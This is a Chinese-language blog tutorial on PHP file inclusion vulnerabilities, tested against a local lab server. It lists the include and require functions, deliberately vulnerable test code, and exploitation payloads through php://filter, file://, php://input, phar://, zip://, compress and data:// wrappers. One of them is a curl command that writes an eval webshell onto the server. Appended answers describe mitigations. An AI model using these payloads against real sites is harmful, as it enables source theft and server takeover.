PHP文件包含漏洞-(可补充)

2020/04/28 每日一剂

今日基汤:
没有白费的努力,也没有碰巧的成功。
---- from my pc

参考链接:
PHP文件包含漏洞利用思路与Bypass总结手册(一)

0、环境

xmapp+火狐(带有hackbar)/burpsuite
(由于一些特殊的情况,比如有些在我的电脑上无法运行,所以还开了一个linux的虚拟机。)

一、 相关函数

php中引发文件包含漏洞的通常主要是以下四个函数:

1、include() http://www.php.net/manual/en/function.include.php
2、include_once() http://php.net/manual/en/function.include-once.php
3、require() http://php.net/manual/en/function.require.php
4、require_once() http://php.net/manual/en/function.require-once.php

二、函数功能

当利用这四个函数来包含文件时,不管文件是什么类型(图片、txt等等),都会直接作为php文件进行解析。
在这里插入图片描述

三、函数差异

1、include()函数

include()函数包含出错的话只会提出警告,但并不会影响后续语句的执行。
复现代码:

<?php
	$file = $_GET['file'];
	include($file);
	echo "Error 404!!!";
?>

执行结果:
在这里插入图片描述

require()函数

require() 函数包含出错的话,则会直接退出,后续语句不在执行

<?php
	$file = $_GET['file'];
	require($file);
	echo "Error 404!!!";
?>

在这里插入图片描述

include_once()和require_once()函数

require_once() 和 include_once() 功能与require() 和 include() 类似。但如果一个文件已经被包含过了,则 require_once() 和 include_once() 则不会再包含它,以避免函数重定义或变量重赋值等问题。

  • require()函数二次包含:(运行代码和示例结果如下:)
<?php
	$file = $_GET['file'];
	//include($file);
	require($file);
	require($file);
	echo "Error 404!!!";
?>

在这里插入图片描述

  • require_once()函数:一次包含(复现代码和示例结果如下)
<?php
	$file = $_GET['file'];
	//include($file);
	//require($file);
	//require($file);
	require($file);
	require_once($file);
	echo "Error 404!!!";
?>

在这里插入图片描述

四、文件包含漏洞原因:

文件包含函数所加载的参数没有经过过滤或者严格的定义,可以被用户控制,包含其他恶意文件,导致执行了非预期的代码。

(一)、漏洞分类

以下除特殊外示例代码均为:

<?php
	$file = $_GET['file'];
	include($file);
	echo "Error 404!!!";
?>

环境:php.ini

allow_url_fopen 默认为 On
allow_url_include 默认为 Off
1、LFI:本地文件包含漏洞

LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件,例如session文件、日志文件、临时文件等。同时借助此漏洞也可以查看服务器上的一些重要文件。但是,只有我们能够控制包含的文件存储我们的恶意代码才能拿到服务器权限。

例如本地读取/etc/passwd系统重要文件。
在这里插入图片描述

2、RFI:远程文件包含漏洞

RFI(Remote File Inclusion) 远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在危害性会很大。但RFI的利用条件较为苛刻,需要php.ini中进行配置

allow_url_fopen = On
# 该选项为on便是激活了 URL 形式的 fopen 封装协议使得可以访问 URL 对象文件等。

allow_url_include = On
# 该选项为on便是允许 包含URL 对象文件等。
两个配置选项均需要为On,才能远程包含文件成功

修改php.ini
在php.ini中,allow_url_fopen默认一直是On,而allow_url_include从php5.2之后就默认为Off。
在这里插入图片描述

(二)、 包含姿势

1、 php伪协议

PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。
可以在phpinfo中的Registered PHP Streams中找到可使用的协议。

file:// — 访问本地文件系统
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

(1)、php://filter

php://filter 是一种元封装器, 设计用于数据流打开时的筛选过滤应用。

参数:
在这里插入图片描述

过滤器列表:

字符串过滤器
string.strip_tags
转换过滤器
压缩过滤器
加密过滤器
可用过滤器列表:https://www.php.net/manual/zh/filters.php

**利用条件:**无

利用姿势1
http://127.0.0.1:8081/test.php?file=php://filter/read=convert.base64-encode/resource=test.php

通过指定末尾的文件,可以读取经base64加密后的文件源码,之后再base64解码一下就行。
虽然不能直接获取到shell等,但能读取敏感文件危害也是挺大的。同时也能够对网站源码进行审计。

在这里插入图片描述

利用姿势2
http://127.0.0.1:8081/test.php?file=php://filter/convert.base64-encode/resource=test.php

效果跟前面一样,只是少了个read关键字,在绕过一些waf时也许有用。
在这里插入图片描述

(2)、file://

专们用于访问本地文件系统和php://filter类似都可以对本地文件进行读取。
用法:

/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\smbserver\share\path\to\winfile.ext
file:///path/to/file.ext
?file=file://[文件的绝对路径+文件名]

**利用条件:**无

利用姿势:

http://127.0.0.1:8081/test.php?file=file://C:\1.txt

在这里插入图片描述

(3)、php://input

是个可以访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行。

php://input可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。enctype=”multipart/form-data” 的时候 php://input 是无效的。
在这里插入图片描述

利用条件

allow_url_include = On
allow_url_fopen = On/Off
利用姿势:

A、火狐hackbar利用(由于我的不知道咋的总没用,所以我就直接把原图附上啦!)

index.php?file=php://input

POST:
<?php phpinfo();?>/<? phpinfo();?>

在这里插入图片描述

B、使用curl 或者burpsuite进行利用

curl -v "http://127.0.0.1/FI/index.php?file=php://input" -d "<?php phpinfo();?>"

在这里插入图片描述

Getshell

A、curl写入
这个我在win10上面不知怎么怎么老是无法写入,后来我便直接在虚拟机中运行,发现成功了。并且可以发现使用 curl后下面会出现一整个数据包。

curl -v "http://192.168.1.3:8081/test.php?file=php://input" -d "<?php fputs(fopen('file.php','w'),'<?php @eval($_POST[Qftm])?>');?>"

在这里插入图片描述
写入成功。
在这里插入图片描述

B、火狐+hackbar运行
以下是win10运行的。指令如下:

http://127.0.0.1:8081/test.php?file=php://input

POST
<?php fputs(fopen('file.php','w'),'<?php @eval($_POST[Qftm])?>');?>
file_get_contents()的利用

file_get_contents()函数将整个文件读入一个字符串中。

测试代码:

<?php
$file  = $_GET['file'];
if(file_get_contents($file,'r') == "Qftm"){
    echo "you are Admin!!!";
}
?>

利用条件:

利用姿势:

A、curl运行

curl -v "http://192.168.1.3:8081/test.php?file=php://input" -d "Qftm"

在这里插入图片描述

B、火狐+hackbar运行

file_get.php?file=php://input

POST:
Qftm
(4)、phar:// (可能是由于版本等其他原因,,我怎么运行都没用。。。所以后面很多原作者图片)

参考链接:https://blog.csdn.net/xiaorouji/article/details/83118619
phar:// 支持zip、phar格式的文件包含。

Zip

用法:

?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名]
?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]

利用条件: php>=5.3.0

利用姿势1

配合文件上传漏洞,当仅可以上传zip格式时

index.php?file=phar://index.zip/index.txt
index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/index.zip/index.txt

新建index.txt,使用zip格式压缩 -> index.zip
在这里插入图片描述

利用姿势2

配合文件上传漏洞,当仅可以上传图片格式时
针对phar://不管后缀是什么,都会当做压缩包来解压。

index.php?file=phar://head.png/head.txt
index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png/head.txt

将做好的zip后缀改为png格式
在这里插入图片描述

phar

phar文件本质上是也一种压缩文件。

用法:

?file=phar://[压缩包文件相对路径]/[压缩文件内的子文件名]
?file=phar://[压缩包文件绝对路径]/[压缩文件内的子文件名]
制作phar文件:

制作包含恶意代码文件的phar文件

(1)确保本地php.ini中phar.readonly=Off
在这里插入图片描述

(2)编写恶意phar文件的php脚本

phar.php

<?php
    @unlink("phar.phar");
    $phar = new Phar("phar.phar");
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>");  //设置stub
    $phar->addFromString("head.txt", "<?php phpinfo();?>");  //添加要压缩的文件及内容
    //签名自动计算 
    $phar->stopBuffering();
?>

(3)生成phar文件

<?php 
$p = new PharData(dirname(__FILE__).'/phartest.aaa', 0,'phartest',Phar::ZIP) ;
$p->addFromString('testfile.txt', '<?php phpinfo();?>'); 
?>

在这里插入图片描述

利用条件: php >= 5.3.0

利用姿势1:
index.php?file=phar://phar.phar/head.txt

index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.phar/head.txt

在这里插入图片描述

利用姿势2:
index.php?file=phar://phar.png/head.txt

index.php?file=phar://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/phar.png/head.txt

利用协议特性,更改后缀文件可适当绕过一些限制。
在这里插入图片描述

(5)、zip://

zip协议和phar协议类似,都支持相对路径和绝对路径(几乎网上所有人都说zip协议不支持相对路径,事实上是可以!!!)
在php version 5.2.9时已经修复zip://相对路径问题

在这里插入图片描述

使用zip协议,需将#编码为%23(浏览器时)
用法:

?file=zip://[压缩包文件相对路径]#[压缩文件内的子文件名]
?file=zip://[压缩包文件绝对路径]#[压缩文件内的子文件名]

**利用条件:**php >= 5.2(绝对路径) | php >= 5.29(相对/绝对路径)

利用姿势1
index.php?file=zip://head.zip%23head.txt

index.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.zip%23head.txt

在这里插入图片描述

利用姿势2

针对zip://不管后缀是什么,都会当做压缩包来解压,可以适当的绕过一些限制。

index.php?file=zip://head.png%23head.txt

index.php?file=zip://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.png%23head.txt

相对路径:
php5.3.29 windows
在这里插入图片描述

绝对路径:

windows
在这里插入图片描述

(6)、bzip2://

用法:

?file=compress.bzip2://[压缩包文件相对路径]
?file=compress.bzip2://[压缩包文件绝对路径]

利用条件: php >= 5.2

利用姿势1:
index.php?file=compress.bzip2://head.bz2

index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.bz2

相对路径:
在这里插入图片描述

绝对路径;

在这里插入图片描述

利用姿势2:

利用协议特性,更改后缀文件可适当绕过一些限制

index.php?file=compress.bzip2://head.jpg

index.php?file=compress.bzip2://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg

在这里插入图片描述

(7)、zlib://

用法:

?file=compress.zlib://[压缩包文件相对路径]
?file=compress.zlib://[压缩包文件绝对路径]

**利用条件:**php >= 5.2

利用姿势1:
index.php?file=compress.zlib://head.gz

index.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.gz

相对路径
在这里插入图片描述

绝对路径
在这里插入图片描述

利用姿势2

利用协议特性,更改后缀文件可适当绕过一些限制

index.php?file=compress.zlib://head.jpg

index.php?file=compress.zlib://D:/QSoftware/W3Server/phpstudy2019/WWW/FI/head.jpg

在这里插入图片描述

(8)、data://

数据流封装器,和php://相似都是利用了流的概念

用法:

data:,<文本数据>
data:text/plain,<文本数据>
data:text/html,<HTML代码>
data:text/html;base64,<base64编码的HTML代码>
data:text/css,<CSS代码>
data:text/css;base64,<base64编码的CSS代码>
data:text/javascript,<Javascript代码>
data:text/javascript;base64,<base64编码的Javascript代码>
data:image/gif;base64,base64编码的gif图片数据
data:image/png;base64,base64编码的png图片数据
data:image/jpeg;base64,base64编码的jpeg图片数据
data:image/x-icon;base64,base64编码的icon图片数据

利用条件:

php >= 5.2
allow_url_fopen = On
allow_url_include = On

利用姿势1:
index.php?file=data:text/plain,<?php phpinfo();?>

index.php?file=data://text/plain,<?php phpinfo();
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: PHP文件包含漏洞是一种常见的Web安全漏洞,攻击者可以利用该漏洞通过包含恶意文件来执行任意代码。其中,利用phpinfo函数可以获取服务器的详细信息,包括PHP版本、操作系统、配置文件路径等,攻击者可以利用这些信息来进一步攻击服务器。因此,对于PHP文件包含漏洞,我们需要及时修复漏洞并加强服务器的安全防护措施,以保障网站的安全性。 ### 回答2: php文件包含漏洞是一种常见的Web应用程序漏洞,它允许攻击者在没有正常访问权限的情况下获取Web应用程序的敏感数据和系统资源。利用phpinfo函数,攻击者可以获得关于Web服务器和PHP环境的详细信息,包括内存使用情况、PHP模块的版本、系统路径、配置文件名等等,这些信息可用于进一步攻击或收集有关系统的信息。 通常情况下,php文件包含漏洞产生的原因是由于Web应用程序没有正确的过滤和验证用户输入,并允许用户传递文件名或路径。如果攻击者可以在该位置输入恶意代码,他们就可以通过访问特定的URL,向web服务器请求文件或脚本来执行所需的操作。 对于php文件包含漏洞,攻击者可以利用phpinfo函数来获取大量有关Web服务器和PHP配置的信息。如果攻击者可以获取此信息,他们将更容易地了解Web服务器的配置和缺陷,从而定向和更容易地入侵目标系统。例如,攻击者可以使用所收集到的信息来寻找系统上的其他漏洞,或者在成功入侵后利用该信息来控制服务器,尝试使用系统权限执行任意代码或更改配置。 为了保护Web应用程序安全,我们可以采取以下措施来防止php文件包含漏洞的发生: 1. 使用安全的编程实践来避免不可信数据输入 2. 防止对敏感资源和服务器配置文件的读取 3. 激活PHP配置参数,如open_basedir,以限制PHP访问的目录 4. 限制Web服务器的目录访问权限 5. 定期检查服务器日志来检测异常行为和攻击行为 6. 采用安全的编程方法避免可能的错误,并保持对最新漏洞和安全威胁的关注 php文件包含漏洞可能会导致非常严重的安全问题,所以应采取有效的措施来保护Web应用程序和服务器的安全。通过实践良好的编程实践和安全性控制策略,可以帮助我们保护Web应用程序不受恶意攻击的影响,从而确保我们的数据和系统的安全性。 ### 回答3: PHP文件包含漏洞是一种常见的网络安全漏洞。它的存在导致黑客可以利用这个漏洞通过访问包含文件来执行任意代码并控制整个服务器。 PHP文件包含漏洞的根源在于PHP提供了一种方便的方式来包含另一个文件中的代码,这种方式是通过 include() 或 require() 函数实现的。这些函数接受一个文件名作为参数,然后将该文件中的代码“拷贝并粘贴”到当前的PHP文件中。这个机制的漏洞是黑客可以通过传递带有恶意代码的参数来包含任意文件,这可能是远程服务器上的PHP脚本,也可能是包含恶意代码的本地文件。 PHPInfo是一个php的系统信息函数,负责显示PHP配置和环境信息。这里,黑客可以利用PHPInfo来寻找服务器的弱点,并进一步利用php文件包含漏洞。通过读入php.ini一个配置文件,该函数可以泄漏服务器的所有信息,包括文件路径、数据库密码、服务器版本、PHP版本等等。 黑客可以通过以下步骤来利用php文件包含漏洞phpinfo()函数进一步渗透服务器: 1. 使用phpinfo()函数来获取服务器的系统信息和配置信息 2. 解析得到的信息,寻找PHP文件包含漏洞的存在 3. 通过向include()或require()函数传递恶意文件来执行任意代码并控制服务器 为了避免这些漏洞PHP开发者应该始终验证来自用户的输入。对于文件包含,应该限制包含文件的范围,禁止包含远程文件,并使用白名单来确定包含文件的位置。同时,应该禁用phpinfo()函数或者确保它只在受信任的环境中使用。 维护者还可以使用一些工具例如模糊测试技术、代码审计等来发现并修复这些漏洞。实施彻底的安全措施对于预防这些漏洞的产生非常重要。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值